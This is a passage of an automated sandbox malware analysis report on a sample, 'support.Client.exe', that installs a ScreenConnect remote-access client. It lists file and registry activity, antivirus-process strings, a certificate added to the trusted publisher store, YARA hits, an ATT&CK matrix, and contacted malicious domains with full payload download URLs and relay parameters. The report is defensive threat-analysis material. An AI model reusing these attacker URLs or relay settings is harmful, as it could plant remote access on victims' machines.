Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Windows.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Client.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Client.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Core.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.ClientService.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..tion_25b0fbb6ef7eb094_0018.0002_f4e3c00aa71291c7\ScreenConnect.WindowsClient.exe

Code function: 9_2_00007FFD9B8B3642 CreateNamedPipeW,

9_2_00007FFD9B8B3642

Source: C:\Users\user\Desktop\support.Client.exe

Code function: 0_2_00AD1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AD1806

Source: C:\Users\user\Desktop\support.Client.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.12.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr	Binary or memory string: MsMpEng.exe

Adds / modifies Windows certificates

Source: C:\Users\user\Desktop\support.Client.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Remote Access Functionality

Yara detected ScreenConnect Tool

Source: Yara match	File source: 6.0.ScreenConnect.WindowsClient.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.1969571966.0000000000C32000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.3548401601.000001AC35347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dfsvc.exe PID: 7120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 2044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ScreenConnect.ClientService.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Search Order Hijacking	1 DLL Search Order Hijacking	1 Obfuscated Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	2 Windows Service	2 Windows Service	1 Install Root Certificate	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	13 Process Injection	1 Timestomp	NTDS	51 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Bootkit	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Search Order Hijacking	Cached Domain Credentials	61 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	61 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	13 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Users	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Bootkit	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Apps\2.0\4XK40T58.9HO\HNQGQVPK.8EV\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Deployment\2TX7DDWQ.ZAL\DR4X6H8L.L45\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
https://g.live.com/odclientsettings/ProdV2.C:	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gbakc990.top	31.42.187.210	true	false	unknown
molatoriup.icu	31.42.187.211	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://molatoriup.icu/Bin/ScreenConnect.ClientService.exe	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.exe.config	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&s=074906cf-7913-4152-acb8-ba6041fce90b&k=BgIAAACkAABSU0ExAAgAAAEAAQCV%2bgTJLvHrJybjJw6NcvaO25WokSvirWMqo0dEE2vOcQcNJ9eH39lX4TPxcS9FirWKTE72z5Z5aT9qfYx6Z7SsW3gRQyCXJKG7lKm2z7mrbxzokPCeA9N7yVfr8VN4w1qYCObq3n3I09zqklSHnlFkUhg9dPWgN6rJljtzEkuqLRuMlM6pUEdMFGNG78jOtwDzUumAfVmBHlhXcfDRYKf9ZDq5MC%2b00HleCSejbkbuH2N%2f29MnCRiB66rZHK5MhlYf3aHKkcTNvy80Z4%2fnvcbI7VyU7XAo9kHuWMoVVof7U68vhKrMivy5PKSsloP9zHL4WOo4AQgjsw5JFyvr%2fP3P&r=&i=dd%20late%20daphny	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.manifest	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe.config	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.dll	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.ClientService.dll	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.Core.dll	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.exe	true	unknown
https://molatoriup.icu/Bin/ScreenConnect.Windows.dll	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application61934e089	ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application%	dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5CA000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5F8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1986954960.000000001B775000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.applications_e089089	dfsvc.exe, 00000001.00000002.3565549071.000001AC4D7E0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.tiro.com	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.2.dr, qmgr.db.2.dr	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application	ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, 5A7K8CL9.log.1.dr	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exeX	dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.sajatypeworks.com	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/Prod.C:	edb.log.2.dr, qmgr.db.2.dr	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Client.application.8EV8EV	dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://molatoriup.icu/Bin/ScreenConnect.Windo	dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.founder.com.cn/cn/cThe	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.2.dr, qmgr.db.2.dr	false		unknown
